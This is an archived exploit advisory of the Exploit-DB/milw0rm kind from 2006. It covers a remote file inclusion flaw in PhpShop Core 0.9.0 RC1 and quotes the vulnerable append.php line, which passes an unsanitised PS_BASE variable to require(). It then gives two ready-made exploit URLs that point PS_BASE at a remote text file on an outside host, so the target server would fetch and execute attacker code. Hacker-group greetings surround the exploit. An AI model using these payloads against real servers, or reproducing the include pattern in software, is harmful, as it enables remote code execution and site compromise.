PhpShop Core 0.9.0 RC1 - 'PS_BASE' File Inclusion

EDB-ID:

2663

CVE:

N/A


Platform:

PHP

Published:

2006-10-28

--------------------------------------||  Viva Palestine ||-----------------------------------------

PhpShop-Core (append.php)  Remot File Include Vulnerability

Found By : CoLd Zero  [ Wasem898 ]

Source   : include_once ($4AZHAR_TeAM."Securty.");

PalesTine Arab Muslim Hacker's

######################################################
#
#            PhpShop-Core  v0.9.0 RC1
#
# Class:     Remote File Include Vulnerability
# Published  2006-10-27
# Remote:    Yes
# Type:      Dangerous
# Site:      http://www.comscripts.com/jump.php?action=script&id=81
#
# Author:    Cold Zero
# Contact:   c.o.1.d.0@hotmail.com
#
######################################################


file ;

/core/html/append.php
/core/demo/append.php

==========================

Vuln Code

<?php
//
// This footer information must be on every page!
require($PS_BASE."modules/core/lib/ps_page_close.inc");

?>
======================================================

Exploit :

Http://www.Victem.0/[phpshop-core_PaTH]/modules/core/demo/append.php?PS_BASE=http://www.human2human.org/cold.txt?

Http://www.Victem.0/[phpshop-core_PaTH]/modules/core/html/append.php?PS_BASE=http://www.human2human.org/cold.txt?

----  Thanx: [MoHaNdKo] [Cold ThreE] [Viper Hacker] [The Wolf KSA] [o0xxdark0o[ [OrGanza] [H@mLiT] [Snake12][Root Shell] [Metoovit] [Fucker_net] [Rageeb]

----  GreeTz: AlL : 4azhar.Com Members , All Xp10.com Members , Lezr.com Member  , xhahax.org Members  , Hack1h.com Members : Dm3r7.com Members

--------------------------------------||  Viva Palestine ||-----------------------------------------

# milw0rm.com [2006-10-28]